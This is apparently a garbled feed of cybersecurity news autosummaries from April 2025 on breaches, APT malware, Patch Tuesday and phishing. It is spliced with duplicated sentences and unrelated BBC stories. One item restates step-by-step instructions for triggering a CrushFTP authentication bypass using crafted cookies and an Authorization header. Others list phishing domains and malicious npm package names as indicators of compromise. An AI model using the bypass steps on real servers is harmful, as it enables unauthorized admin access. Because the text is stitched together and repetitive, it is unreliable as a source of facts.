Misconfigurations can compromise mobile devices Mobile device security must now be a priority for security teams, given the increased availability of sophisticated malware, the development of state-sponsored mobile malware, an notable number of iOS zero-day vulnerabilities, and a significant reliance on mobile social engineering. "Autosummary:
" Intel Agencies Warn of BadBazaar and MOONSHINE The findings also follow a joint advisory issued by cybersecurity and intelligence agencies from Australia, Canada, Germany, New Zealand, the United Kingdom, and the United States about the targeting of Uyghur, Taiwanese, and Tibetan communities using malware families such as BadBazaar and MOONSHINE. The use of BadBazaar has been tied to a Chinese hacking group tracked as APT15, which is also known as Flea, Nylon Typhoon (formerly Nickel), Playful Taurus, Royal APT, and Vixen Panda. "Autosummary:
"Autosummary:
Gamaredon targeted the military mission of a Western country based in Ukraine Pierluigi Paganini April 11, 2025 April 11, 2025 Gamaredon targeted a foreign military mission in Ukraine with updated GammaSteel malware on Feb 26, 2025, per Symantec. "Autosummary:
"Autosummary:
BlackFog"s "State of Ransomware" report, details over 100 publicly-disclosed attacks in March 2025 - an 81% increase from the year before - with an average ransom demand of US $663,582. "Autosummary:
Some of the other payloads dropped by PowerModul are listed below - FlashFileGrabber , which is used to steal files from removable media, such as flash drives, and exfiltrate them to the C2 server , which is used to steal files from removable media, such as flash drives, and exfiltrate them to the C2 server FlashFileGrabberOffline , a variant of FlashFileGrabber that searches removable media for files with specific extensions, and when found, copies them to the local disk within the "%TEMP%\CacheStore\connect\" folder , a variant of FlashFileGrabber that searches removable media for files with specific extensions, and when found, copies them to the local disk within the "%TEMP%\CacheStore\connect\" folder USB Worm, which is capable of infecting removable media with a copy of PowerModul PowerTaskel is functionally similar to PowerModul in that it"s also designed to run PowerShell scripts sent by the C2 server. "Autosummary:
For detailed insights into contemporary IAB tactics, including access types, privilege usage, and recommended protective measures, consult the comprehensive IAB guide or attend our talk at this year"s RSA conference by Adi Bleih, Security Researcher titled Initial Access Brokers – A Deep Dive on April 30th at 2:25pm in HT-W09.Therefore, proactive cyber security measures, including threat intelligence on up to date TTPs, continuous monitoring, and employee training, will become increasingly critical in mitigating the growing threat posed by IABs.While 2023 saw an average listing price of $1,979, skewed by occasional high-value targets reaching tens of thousands of dollars, the median price remained significantly lower at $1,000, with a majority of listings below $3,000. "A threat actor that has been using known old FortiOS vulnerabilities to breach FortiGate devices for years has also been leveraging a clever trick to maintain undetected read-only access to them after the original access vector was locked down, Fortinet has revealed on Thursday. “[Read-only access] was achieved via creating a symbolic link connecting the user filesystem and the root filesystem in a folder used to serve language files for the SSL-VPN,” Fortinet CISO Carl … More
The post Hackers exploit old FortiGate vulnerabilities, use symlink trick to retain limited access to patched devices appeared first on Help Net Security.
"Autosummary:
Earlier this week, Fortinet started sending out an email notice to an unknown number of customers, saying that their telemetry shows they had been affected and advising them to take immediate action by: Upgrading to FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17 or 6.4.16 to remove the malicious file and prevent a new compromise Reviewing the configuration of the device but also treating it as potentially compromised Going through the steps outlined here, which include resetting all users’ credentials, revoking certificates, resetting secrets, etc. "Autosummary:
The attackers are believed to have leveraged known and now-patched security flaws, including, but not limited to, CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762. "Autosummary:
The stolen data from the LSC breach may include names, addresses, phone numbers, and emails, as well as medical information (diagnoses, lab results, treatment details), health insurance details (plan info, member IDs), billing and payment data (bank account and card info), and sensitive identifiers like Social Security numbers, driver’s license or passport numbers, dates of birth, and student or government IDs. "Autosummary:
"Packed with real-world scenarios, hands-on techniques, and insights into widely used tools, the third edition of the bestselling Ultimate Kali Linux Book offers a practical path to learning penetration testing with Kali Linux. About the author Glen D. Singh, a seasoned cybersecurity author and lecturer, brings deep expertise in cybersecurity operations, offensive security tactics, and enterprise networking. He holds an MSc in Cybersecurity and numerous industry certifications. Inside the book One of the best things … More
The post Review: The Ultimate Kali Linux Book, Third Edition appeared first on Help Net Security.
"Autosummary:
About the author Glen D. Singh, a seasoned cybersecurity author and lecturer, brings deep expertise in cybersecurity operations, offensive security tactics, and enterprise networking.Packed with real-world scenarios, hands-on techniques, and insights into widely used tools, the third edition of the bestselling Ultimate Kali Linux Book offers a practical path to learning penetration testing with Kali Linux. "Autosummary:
"Fortinet has released patches for flaws affecting many of its products, among them a critical vulnerability (CVE-2024-48887) in its FortiSwitch appliances that could allow unauthenticated attackers to gain access to and administrative privileges on vulnerable devices. About CVE-2024-48887 Fortinet offers a range of FortiSwitch networking appliances, including access switches, distribution switches (for managing traffic), industrial/rugged switches, and core switches designed for data centers. Fortinet describes CVE-2024-48887 as an unverified password change vulnerability in the FortiSwitch … More
The post FortiSwitch vulnerability may give attackers control over vulnerable devices (CVE-2024-48887) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
“On systems with an affected ESET product installed, an attacker could plant a malicious dynamic-link library to a specific folder and execute its content by running ESET Command Line Scanner, which would load the planted library instead of the intended system library.” reads ESET’s advisory. "Autosummary:
Payload stored in Registry, obfuscated and split by functions Source: Symantec The malware can steal documents (.DOC, .PDF, .XLS, .TXT) from various locations like Desktop, Documents, and Downloads, confirming Gamaredon’s continuing interest in espionage. "Autosummary:
If you’re using OttoKit/SureTriggers, upgrade to version 1.0.79 as soon as possible and check logs for unexpected admin accounts or other user roles, installation of plugins/themes, database access events, and modification of security settings. "Autosummary:
The vulnerability CVE-2024-53197 (CVSS score of 7.8) resides in the Linux kernel’s ALSA USB-audio driver affecting Extigy and Mbox devices, where incorrect handling of USB configuration data could lead to out-of-bounds memory access. "Autosummary:
BBC Verify Share Save British man’s tattoo wrongly linked to Venezuelan gang in US government document A tattoo belonging to a man from Derbyshire has appeared in a US government document used to identify members of a notorious Venezuelan gang - despite the man having no connection to the group. "Autosummary:
In February, Mr Musk made an unsolicited bid for OpenAI, offering to buy it for $97.4 billion, which Mr Altman rejected by posting: "no thank you but we will buy twitter for $9.74 billion if you want." "In this Help Net Security interview, Kevin Serafin, CISO at Ecolab, discusses aligning security strategy with long-term business goals, building strong partnerships across the organization, and approaching third-party risk with agility. How do you define cyber risk within your organization’s overall enterprise risk framework? At Ecolab, we don’t approach cyber risk in isolation. Instead, it’s positioned as an integral component of our overall enterprise risk management framework. We define cyber risk as the potential for … More
The post Transforming cybersecurity into a strategic business enabler appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Kevin Serafin, CISO at Ecolab, discusses aligning security strategy with long-term business goals, building strong partnerships across the organization, and approaching third-party risk with agility.We define cyber risk as the potential for loss or harm related to technical infrastructure, use of technology, or management of information and, generally, we evaluate risk in a few different ways. First, we look at operational risks which includes risks that could disrupt our ability to deliver products or services including system outages, data corruption, or impact to critical infrastructure that could affect business continuity. "Autosummary:
Some of the other notable vulnerabilities patched by Redmond this month include a security feature bypass (SFB) flaw affecting Windows Kerberos (CVE-2025-29809), as well as remote code execution flaws in Windows Remote Desktop Services (CVE-2025-27480, CVE-2025-27482), and Windows Lightweight Directory Access Protocol (CVE-2025-26663, CVE-2025-26670) Also of note are multiple Critical-severity remote code execution flaws in Microsoft Office and Excel (CVE-2025-29791, CVE-2025-27749, CVE-2025-27748, CVE-2025-27745, and CVE-2025-27752) that could be exploited by a bad actor using a specially crafted Excel document, resulting in full system control. "Autosummary:
For instance, to protect their and their family’s personal information, 47% of people said they “stopped using TikTok,” 45% said they “stopped using X” (formerly Twitter), 44% said they “stopped using Instagram,” and 37% said they “stopped using Facebook.” While 87% of people “support national laws regulating how companies can collect, store, share, or use our personal data,” 60% feel that “we will never have simple, meaningful ways to protect our data.” A full 87% of people “support national laws regulating how companies can collect, store, share, or use our personal data,” while 70% also believe “we will never have simple, meaningful ways to protect our data.” "WhatsApp users are urged to update the Windows client app to plug a serious security vulnerability (CVE-2025-30401) that may allow attackers to trick users into running malicious code. Meta classifies the vulnerability as a spoofing issue that makes all WhatsApp for Windows versions prior to v2.2450.6 display sent attachments according to their MIME (media) type – i.e., the metadata that says what kind of file it is: audio, image, message, text, application, etc. – but … More
The post WhatsApp vulnerability could be used to infect Windows users with malware (CVE-2025-30401) appeared first on Help Net Security.
"Autosummary:
"A critical RCE vulnerability (CVE-2025-30406) affecting the Gladinet CentreStack file-sharing/remote access platform has been added to CISA’s Known Exploited Vulnerabilities catalog on Tuesday. According to the vulnerability’s entry in NIST’s National Vulnerability Database, the flaw has been leveraged in attacks since March 2025. About CVE-2025-30406 CentreStack is a platform that allows managed service providers (MSPs) to offer cloud-like file services to their customers: file sharing, backup, collaboration, and remote access. CVE-2025-30406 is a deserialization vulnerability … More
The post RCE flaw in MSP-friendly file sharing platform exploited by attackers (CVE-2025-30406) appeared first on Help Net Security.
"Autosummary:
Vulnerabilities (often zero-days) in enterprise-grade file transfer/sharing solutions are often exploited by attackers: flaws in Progress Software’s MOVEit solution, Cleo‘s various file transfer software, Fortra’s GoAnywhere and, most recently, CrushFTP have been leveraged by attackers in the past two years. "Autosummary:
It"s worth pointing out at this stage that "version.dll" is a legitimate version-checking and file installation library from Microsoft that resides in the "C:\Windows\system32\" or "C:\Windows\SysWOW64\" directories. "Autosummary:
"In some of the other attacks that we attribute to the same actor, we also observed that, prior to exploiting the CLFS elevation-of-privilege vulnerability, the victim"s machines were infected with a custom modular backdoor named "PipeMagic" that gets launched via an MSBuild script," Kaspersky pointed out in April 2023. "Autosummary:
"Autosummary:
Driver flaws to its Known Exploited Vulnerabilities catalog Pierluigi Paganini April 09, 2025 April 09, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Gladinet CentreStack and ZTA Microsoft Windows Common Log File System (CLFS) "Autosummary:
Hackers exploited a vulnerability in Gladinet CentreStack"s secure file-sharing software as a zero-day since March to breach storage servers Gladinet CentreStack is an enterprise file-sharing and access platform that turns on-premise file servers (like Windows servers with SMB shares) into secure, cloud-like file systems supporting remote access to internal file shares, file syncing and sharing, multi-tenant deployments, and integration with Active Directory. "Autosummary:
This initial access led to a massive data breach, costing MGM Resorts millions in revenue and causing widespread system disruptions, including issues with reservations, electronic payments, and slot machines in casinos. By implementing authentication measures, educating employees, and adopting security best practices, organizations can reduce their exposure to vishing attacks. Vishing, or "voice phishing," is a form of social engineering where scammers use phone calls to deceive victims into revealing sensitive information or making fraudulent payments. Some cybercriminals also offer "Vishing-as-a-Service" (VaaS), where they sell their talents to less-skilled fraudsters. "Autosummary:
Unlike traditional mass-targeting phishing, this new method uses real-time email validation to ensure phishing content is shown only to pre-verified, high-value targets. "Autosummary:
"Autosummary:
Guardio Labs" latest analysis takes a step further, uncovering that platforms like Lovable and Anthropic Claude, to a lesser extent, could be weaponized to generate complete scam campaigns, complete with SMS text message templates, Twilio-based SMS delivery of the fake links, content obfuscation, defense evasion, and Telegram integration. "Autosummary:
The top four most exploited CVEs by volume were: CVE-2017-9841 – PHPUnit remote code execution via eval-stdin.php (69,433 attempts) – PHPUnit remote code execution via eval-stdin.php (69,433 attempts) CVE-2020-8958 – Guangzhou ONU OS command injection RCE (4,773 attempts) – Guangzhou ONU OS command injection RCE (4,773 attempts) CVE-2023-1389 – TP-Link Archer AX21 command injection RCE (4,698 attempts) – TP-Link Archer AX21 command injection RCE (4,698 attempts) CVE-2019-9082 – ThinkPHP PHP injection RCE (3,534 attempts) Exploitation volumes Source: F5 "Autosummary:
Other benefits: The CNSS also provides benefits for maternity, invalidity, family allowances, death grants, and survivor’s pensions The threat actor has leaked CSV and PDF files containing personal information about 1,996,026 employees from various enterprises operating in Morocco. "The financial sector is under growing pressure from advanced phishing attacks and fraud, causing major financial losses and eroding customer trust. Escalation of phishing attacks While traditional phishing relied on generic emails to steal sensitive data, cybercriminals now use targeted spear-phishing, leveraging personal information for credibility. AI-driven attacks, including deepfake scams, allow fraudsters to impersonate bank executives or customer service representatives, making detection more difficult. Voice phishing (vishing) and SMS phishing (smishing) have also risen, … More
The post Phishing, fraud, and the financial sector’s crisis of trust appeared first on Help Net Security.
"Autosummary:
Phishing and fraud erode customer trust, threatening the financial sector’s reputation The financial toll on victims of phishing and fraud is immense, with many losing significant amounts of money, including life savings, in a single scam.Finally, continuous education and awareness programs for employees and consumers are vital in protecting customer data, maintaining trust, and strengthening the human defense layer,” said Sunil Mallik, CISO of Discover Financial Services.These links appear in various sources, including emails, messaging apps, social media, advertisements, and search engine results. "62% of utility operators were targeted by cyberattacks in the past year, and of those, 80% were attacked multiple times, according to Semperis. 54% suffered permanent corruption or destruction of data and systems. (Source: Semperis) Utilities face rising cyber threats Recent high-profile cyberattacks by nation-state groups on water and electricity utilities underscore the vulnerability of critical infrastructure. A public utility in Littleton, MA, was recently compromised by a group linked to Volt Typhoon, the Chinese … More
The post Cyberattacks on water and power utilities threaten public safety appeared first on Help Net Security.
"Autosummary:
Prioritize incident response and recovery for these systems, followed by mission-critical (Tier 1) functions, business-critical (Tier 2) functions, and then all other (Tier 3) functions. "Application Security Engineer (DevSecOps & VAPT) Derisk360 | India | On-site – View job details As an Application Security Engineer (DevSecOps & VAPT), you will integrate security into CI/CD pipelines, conduct vulnerability assessments and penetration testing, and use tools like SonarCloud and Checkmarx for secure code analysis. You will also guide developers on secure coding practices, perform code reviews, and conduct regular application security audits. Cyber and Information Security Architect Prospera Credit Union | Canada | … More
The post Cybersecurity jobs available right now: April 8, 2025 appeared first on Help Net Security.
"Autosummary:
Senior Penetration Tester Ekco | Ireland | On-site – View job details As a Senior Penetration Tester, you will conduct comprehensive penetration tests on clients’ systems across various platforms (including web applications, mobile applications, thick client applications, infrastructure, APIs, cloud platforms) to identify security vulnerabilities, weaknesses, and potential risks. Network Engineer London Luton Airport | United Kingdom | On-site – View job details As a Network Engineer, you will be responsible for designing, maintaining, and supporting the networking infrastructure in both on-premise and cloud environments, including switching, routing, encryption, security, VoIP and wireless. Manager, Cybersecurity, Global Vantage Data Centers | USA | Remote – View job details As a Manager, Cybersecurity, Global, you will develop and lead enterprise security policies, standards, and risk management frameworks to safeguard critical infrastructure. Cyber Security Engineer Chicago Housing Authority | USA | Hybrid – View job details As a Cyber Security Engineer, you will lead the design, implementation, and management of security systems, including firewalls, intrusion prevention systems, and endpoint protection. "Autosummary:
"Autosummary:
Other observers have posted on Facebook evidence of how propaganda has been posted by thousands of accounts on Telegram groups in the form of comments claiming "Romanians are the servants of the Europeans, the EU is stealing our wealth, the authorities are against the people, Romanians must wake up and stop being cowards..." Ironically, some of the comments have been accidentally left in Russian rather than properly translated into Romanian. "Autosummary:
" The Swedish cybersecurity company has since released step-by-step instructions to trigger the exploit without sharing much of the technical specifics - Generate a random alphanumeric session token of a minimum 31 characters of length Set a cookie called CrushAuth to the value generated in step 1 Set a cookie called currentAuth to the last 4 characters of the value generated in step 1 Perform an HTTP GET request to the target /WebInterface/function/ with the cookies from steps 2 and 3, as well as an Authorization header set to "AWS4-HMAC=<username>/," where <username> is the user to be signed in as (e.g., crushadmin) "Autosummary:
Google fixed two actively exploited Android zero-days Pierluigi Paganini April 08, 2025 April 08, 2025 Google addressed 62 vulnerabilities with the release of Android ‘s April 2025 security update, including two actively exploited zero-days. "Autosummary:
Technical details The zero-days are both located in the kernel: CVE-2024-53150: an out-of-bounds flaw in the USB sub-component of the Linux Kernel that could result in information disclosure. "Ontinue announced ION for Enhanced Phishing Protection. This new add-on service extends phishing detection and response capabilities for ION MXDR customers, significantly reducing cyber risk by handling emails reported as suspicious by end users. ION for Enhanced Phishing Protection empowers organizations to mitigate phishing threats efficiently while maximizing the ROI of their existing Microsoft Security investments. Phishing remains one of the most persistent and costly cybersecurity threats organizations face today. Despite investments in advanced security … More
The post Ontinue empowers organizations to mitigate phishing threats appeared first on Help Net Security.
"Autosummary:
Key capabilities of ION for Enhanced Phishing Protection include: Automated analysis of user-reported phishing emails : ION automates the analysis of all incoming phishing alerts, examining user accounts, hosts, mailboxes, IP addresses, files, and URLs. "Autosummary:
"Autosummary:
Most of the attacks originate from Taiwan, Japan, and South Korea, while the majority of the targeted devices are based in the U.S., the U.K., and Germany. "Autosummary:
Malicious project (left) and legitimate tool (right) Source: Kaspersky However, when users search for office add-ins on Google Search (and other engines), they get results pointing to "officepackage.sourceforge.io," powered by a separate web hosting feature SourceForge gives to project owners. "Autosummary:
This ransomware gang has also targeted high-profile organizations, including computer hardware giant GIGABYTE, Konica Minolta, the Texas Department of Transportation (TxDOT), Brazil"s court system, Montreal"s STM public transport system, and government software provider Tyler Technologies. "Autosummary:
"Autosummary:
Malicious QuickBooks domains quicckboocks-accounting[.]com quicckbooks-accounting[.]com quicckrbooks-acccounting[.]com quicfkbooks-accounting[.]com quichkbooks-accounting[.]com quicjkbooks-accounting[.]com quickboorks-acccounting[.]com quickboorks-accountings[.]com quicnkbooks-accounting[.]com quicrkbookrs-accounting[.]com quicrkbooks-acccounting[.]com quicrkbooks-accountting[.]com quicrkboorks-accounnting[.]com quicrkboorks-accounting[.]com quicrkbrooks-online[.]com quicrkrbooks-accounting[.]com quictkbooks-accounting[.]com quicvkbooks-accounting[.]com quicxkbooks-accounting[.]com quirckbooks-accounting[.]com "April 2025 Patch Tuesday is here, and Microsoft has delivered fixes for 120+ vulnerabilities, including a zero-day (CVE-2025-29824) that’s under active attack. CVE-2025-29824 CVE-2025-29824 is a user-after-free vulnerability in the Windows Common Log File System (CLFS) that can be – and is being – exploited by attackers to elevate their privileges to SYSTEM on previously compromised Windows machines. “CLFS is no stranger to Patch Tuesday – since 2022, Microsoft has patched 32 CLFS vulnerabilities, averaging … More
The post Microsoft fixes actively exploited Windows CLFS zero-day (CVE-2025-29824) appeared first on Help Net Security.
"Autosummary:
Among the “more likely” to be exploited bugs fixed this time around are also: CVE-2025-27472, a flaw allowing attackers to evade Windows Mark of the Web (MotW) bypass defenses CVE-2025-27727, an EOP flaw in the Windows Installer CVE-2025-29809, a vulnerability that can allow authorized attackers to bypass Windows Defender Credential Guard to leak Kerberos (authentication) credentials. "Autosummary:
Should victims click on the download button, they are served a 7 MB ZIP archive ("vinstaller.zip"), which, when opened, contains a second password-protected archive ("installer.zip") and a text file with the password to open the file." While every project created on sourceforge.net gets assigned a "<project>.sourceforge.io" domain name, the Russian cybersecurity company found that the domain for officepackage, "officepackage.sourceforge[.]io," displays a long list of Microsoft Office applications and corresponding links to download them in Russian. "YES3 Scanner is an open-source tool that scans and analyzes 10+ different configuration items for your S3 buckets in AWS. This includes access such as public access via ACLs and bucket policies – including the complex combinations of account and bucket settings that can make a S3 bucket effectively public. “We built this tool after realizing potential users needed a better way to scan their S3 resources for access and ransomware protection. We wanted to … More
The post YES3 Scanner: Open-source S3 security scanner for public access, ransomware protection appeared first on Help Net Security.
"Autosummary:
YES3 Scanner checks for the following S3 configuration items: Bucket Access Control Lists (ACLs) Bucket Policy (Resource-Based Policy) Bucket Website Settings Account Public Access Block Bucket Public Access Block Disabled ACLs (via Ownership Controls) Bucket Encryption Settings Object Lock Configuration Bucket Versioning Settings Bucket Lifecycle Configuration Future plans and download “Our future plans are to include more analysis on S3 and cloud configuration such as logging to help provide holistic security against access and ransomware in the cloud. "N-able announced the upcoming launch of its Vulnerability Management feature for their UEM (Unified Endpoint Management) products, N-central and N-sight. The new built-in feature will allow organizations to identify, prioritize, remediate, and report on vulnerabilities across all major operating systems (OS). With a single unified view, IT teams will gain continuous visibility to vulnerabilities, rapid prioritization, and can leverage automated workflows for remediation. There has been a rapid increase in both the volume of vulnerabilities … More
The post N-able Vulnerability Management identifies vulnerabilities across all major operating systems appeared first on Help Net Security.
"Autosummary:
Benefits of the new feature include: Complete visibility for OS and application vulnerabilities: giving technicians and security specialists important details like severity scoring and CVE details, allowing for rapid prioritization across endpoints on Windows, Mac, and Linux. "Autosummary:
Crypto companies like Coinbase and Ledger, and bulk email providers such as Mailchimp, SendGrid, Hubspot, Mailgun, and Zoho are among the targeted crypto companies. "Autosummary:
This week"s list includes — CVE-2025-22457 (Ivanti Connect Secure, Policy Secure, and ZTA Gateway), CVE-2025-30065 (Apache Parquet), CVE-2024-10668 (Google Quick Share for Windows), CVE-2025-24362 (github/codeql-action), CVE-2025-1268 (Canon), CVE-2025-1449 (Rockwell Automation Verve Asset Manager), CVE-2025-2008 (WP Ultimate CSV Importer plugin), CVE-2024-3660 (TensorFlow Keras), CVE-2025-20139 (Cisco Enterprise Chat and Email), CVE-2025-20212 (Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series), CVE-2025-27520 (BentoML), CVE-2025-2798 (Woffice CRM theme), CVE-2025-2780 (Woffice Core plugin), CVE-2025-31553 (WPFactory Advanced WooCommerce Product Sales Reporting plugin), CVE-2025-31579 (EXEIdeas International WP AutoKeyword plugin), and CVE-2025-31552 (RSVPMarker plugin).— They are 123456, 1234, Password1, 12345, P@sswOrd, password, Password123, Welcome1, 12345678, and Aa123456, according to Specops, based on an analysis of 15 million passwords used to attack RDP ports.Multiple cybersecurity companies, including Black Kite, CloudSEK, CyberAngel, Hudson Rock, Orca Security, SOCRadar, Sygnia, and Trustwave, have analyzed and validated the data posted for sale online as directly extracted from Oracle.Multiple cybersecurity companies, including Black Kite, CloudSEK, CyberAngel, Hudson Rock, Orca Security, SOCRadar, Sygnia, and Trustwave, have analyzed and validated the data posted for sale online as directly extracted from Oracle.Written in Python, the malware is publicly available on GitHub and comes with capabilities to log keystrokes, run commands, record screens, gather Wi-Fi information, and steal passwords, clipboard content, and Roblox security cookies.Written in Python, the malware is publicly available on GitHub and comes with capabilities to log keystrokes, run commands, record screens, gather Wi-Fi information, and steal passwords, clipboard content, and Roblox security cookies.It has now emerged that the popular static analysis tool, SpotBugs, was compromised in November 2024, using it as a stepping stone to compromise "reviewdog/action-setup," which subsequently led to the infection of "tj-actions/changed-files."It has now emerged that the popular static analysis tool, SpotBugs, was compromised in November 2024, using it as a stepping stone to compromise "reviewdog/action-setup," which subsequently led to the infection of "tj-actions/changed-files."" — Google, in collaboration with NVIDIA and HiddenLayer, has announced the release of a Python library called "model-signing" that offers developers a way to sign and verify machine learning (ML) models in an effort to bolster the security of the ML supply chain and safeguard against emerging threats like model and data poisoning, prompt injection, prompt leaking and prompt evasion. ⚡ Threat of the Week UNC5221 Exploits New Ivanti Flaw to Drop Malware — The China-nexus cyber espionage group tracked as UNC5221 exploited a now-patched flaw in Ivanti Connect Secure, CVE-2025-22457 (CVSS score: 9.0), to deliver an in-memory dropper called TRAILBLAZE, a passive backdoor codenamed BRUSHFIRE, and the SPAWN malware suite.Google Partners with NVIDIA and HiddenLayer for a New Model Signing Library — Google, in collaboration with NVIDIA and HiddenLayer, has announced the release of a Python library called "model-signing" that offers developers a way to sign and verify machine learning (ML) models in an effort to bolster the security of the ML supply chain and safeguard against emerging threats like model and data poisoning, prompt injection, prompt leaking and prompt evasion."These vulnerabilities arise from the unsafe use of torch.load(), which is used to deserialize model checkpoints, configurations, and sometimes metadata," the CERT Coordination Center (CERT/CC) said."These vulnerabilities arise from the unsafe use of torch.load(), which is used to deserialize model checkpoints, configurations, and sometimes metadata," the CERT Coordination Center (CERT/CC) said. 📰 Around the Cyber World Oracle Privately Confirms Data Breach — Enterprise computing giant Oracle is reportedly informing its customers in private that it hackers compromised a "legacy" Oracle environment, exposing usernames, passkeys, and encrypted passwords, contradicting its consistent public denial about the incident. — Enterprise computing giant Oracle is reportedly informing its customers in private that it hackers compromised a "legacy" Oracle environment, exposing usernames, passkeys, and encrypted passwords, contradicting its consistent public denial about the incident."When people think of cybercriminals, they tend to imagine high-tech, government-backed teams and elite hackers using cutting-edge technology," Outpost24 said."When people think of cybercriminals, they tend to imagine high-tech, government-backed teams and elite hackers using cutting-edge technology," Outpost24 said.The new standard "brings Python in line with other ecosystems like JavaScript (package-lock.json), Rust (Cargo.lock), and Go (go.sum)," Socket said.The new standard "brings Python in line with other ecosystems like JavaScript (package-lock.json), Rust (Cargo.lock), and Go (go.sum)," Socket said. "Autosummary:
We rely on metrics that tell a story of the tremendous efforts we"re expending - how many vulnerabilities we patched, how fast we responded - but often vulnerability management metrics get associated with operational metrics because traditional approaches to measuring and implementing vulnerability management does not actually reduce risk.Attackers chain together exposures - misconfigurations, overprivileged identities, unpatched CVEs - to reach high-value targets.Whether it"s credential misuse, missing patches, open ports, or cloud misconfigurations, this breakdown informs both tactical response and strategic planning. Taken together and continuously updated, meaningful metrics give you more than a snapshot - they provide a living, contextual view of your threat exposure.They typically fall into three main types: Volume metrics – These count things: patches applied, vulnerabilities discovered, scans completed. "Autosummary:
In 2025, Scattered Spider has targeted brands including: Audemars Piguet, Chick-fil-A, Credit Karma, Forbes, Instacart, Louis Vuitton, Morningstar, New York Digital Investment Group, News Corporation, Nike, Paxos, Twitter/X, and Vodafone.” concludes the report.PoisonSeed Campaign uses stolen email credentials to spread crypto seed scams and and empty wallets Pierluigi Paganini April 07, 2025 April 07, 2025 A campaign named PoisonSeed uses stolen CRM and bulk email credentials to send crypto seed scams, aiming to empty victims’ digital wallets. "Autosummary:
"WK Kellogg learned on February 27, 2025, that a security incident may have occurred involving Cleo," reads the notice. "Autosummary:
Indicators of Compromise (IoCs) Domains involved in toll fee scams: com-roadioe[.]cc uoshxkdhkz[.]top com-zgoupbb[.]top forfeitzm[.]top sunpass-verification[.]top com-tollbilljhy[.]top com-etc-bbzj[.]vip com-tollbilltid[.]vip com-tollbilltwd[.]vip paytollrbzx[.]vip com-ticketvb[.]xin com-emzwepr[.]xin com-ustolls[.]xin com-tollbilaz[.]xin etc-tollad[.]xin roadetctre[.]xin Did you know that Malwarebytes for mobile scans your texts for scams and blocks known malicious sites?These attempts come as an unexpected text message linking to a website pretending to belong to one of the US toll authorities, like E-ZPass, The Toll Roads, SunPass, or TxTag. "Autosummary:
It can be either a single flux, where a single domain name is linked to numerous IP addresses, or double flux, where in addition to changing the IP addresses, the DNS name servers responsible for resolving the domain are also changed frequently, offering an extra layer of redundancy and anonymity for the rogue domains. "Autosummary:
Moreover, 100,000 Euros, mobile phones, computers, hard drives, firearms, and documents were seized during the police raids. "Autosummary:
"Autosummary:
"Autosummary:
U.S. CISA adds Ivanti Connect Secure, Policy Secure and ZTA Gateways flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini April 07, 2025 April 07, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Connect Secure, Policy Secure and ZTA Gateways flaw to its Known Exploited Vulnerabilities catalog. "Autosummary:
"The hardest evidence was from the fact that the password files EncrypHub exfiltrated from his own system had accounts linked to both EncryptHub, like credentials to EncryptRAT, which was still in development, or his account on xss.is, and to SkorikARI, like accesses to freelance sites or his own Gmail account," explained Garcia. "Autosummary:
"Most homegrown brands rely on off-the-shelf soles from the market, but when we started Comet, we realized that these were lacking in quality, durability, and grip," he says.Sabhib Agrawal is trying to get those buyers interested in barefoot footwear - shoes which, their makers say, are healthy for the foot as they encourage natural, or barefoot, movement."Many consumers, especially in rural and lower-income urban areas, opt for cheaper local footwear instead of branded options," he says. "Autosummary:
"Autosummary:
The messages embed links that, if clicked, take the victim to a phishing site impersonating E-ZPass, The Toll Roads, FasTrak, Florida Turnpike, or another toll authority that attempts to steal their personal information including names, email addresses, physical addresses, and credit card information. "Autosummary:
Oracle privately notifies Cloud data breach to customers Pierluigi Paganini April 06, 2025 April 06, 2025 Oracle confirms a cloud data breach, quietly informing customers while downplaying the impact of the security breach. Oracle is privately notifying customers of a breach affecting usernames, passkeys, and encrypted passwords, with the FBI and CrowdStrike investigating the incident. "Autosummary:
The Port confirmed that an unauthorized actor accessed and encrypted parts of their computer systems, disrupting key services like baggage handling, check-in kiosks, ticketing, Wi-Fi, and parking. Threat actors stole individuals’ information that included some combination of names, dates of birth, Social Security numbers (or last four digits of Social Security number), driver’s license or other government identification card numbers, and some medical information. "Autosummary:
The packages in question, which were collectively downloaded more than 5,600 times prior to their removal, are listed below - empty-array-validator twitterapis dev-debugger-vite snore-log core-pino events-utils icloud-cod cln-logger node-clog consolidate-log consolidate-logger "Autosummary:
The presenter, who has faced the loss of his own child, says he hoped "in that moment, just to make this lady feel comforted, feel heard and feel like she had a voice to speak about all that"s wrong in that area". "Autosummary:
Brazil to host Prince William"s Earthshot Prize Prince William"s Earthshot Prize aims to recognise ideas and technologies that can safeguard the planet The Earthshot Prize is a 10-year project with past ceremonies held in London, Boston, Singapore and Cape Town. "Technology has entered all areas of life, and our cars are no exception. They have become computers on wheels, equipped with sensors, software, and connectivity that provide safety and comfort. However, like all technological innovations, this one also brings risks, making cars vulnerable to cyberattacks. The very fact that someone can hack a vehicle and take control of it is terrifying, turning scenarios from movies into reality. Add to this the fact that software in … More
The post Connected cars drive into a cybersecurity crisis appeared first on Help Net Security.
"Autosummary:
In addition, internal vehicle networks such as the CAN bus (which connects key systems like brakes and engine control) are vulnerable to tampering, potentially allowing hackers to manipulate vehicle functions, such as speed, braking, or even disabling safety features. In the event of a security breach, things like our driving data, contacts, call logs, messages, and even location info could end up in the wrong hands. Cybersecurity risks to automotive systems Automotive systems face various cybersecurity threats, including remote hacks, physical attacks, software vulnerabilities, and malware. "Autosummary:
The use of SPAWN is attributed to a China-nexus adversary tracked as UNC5221, which has a history of leveraging zero-day flaws in Ivanti Connect Secure (ICS) devices, alongside other clusters such as UNC5266, UNC5291, UNC5325, UNC5330, UNC5337, and UNC3886. "Autosummary:
"Autosummary:
Proton66, also linked to another BPH service known as PROSPERO, has been attributed to several campaigns distributing desktop and Android malware like GootLoader, Matanbuchus, SpyNote, Coper (aka Octo), and SocGholish. "Autosummary:
CERT-UA reports attacks in March 2025 targeting Ukrainian agencies with WRECKSTEEL Malware Pierluigi Paganini April 04, 2025 April 04, 2025 CERT-UA reported three cyberattacks targeting Ukraine’s state agencies and critical infrastructure to steal sensitive data. "Autosummary:
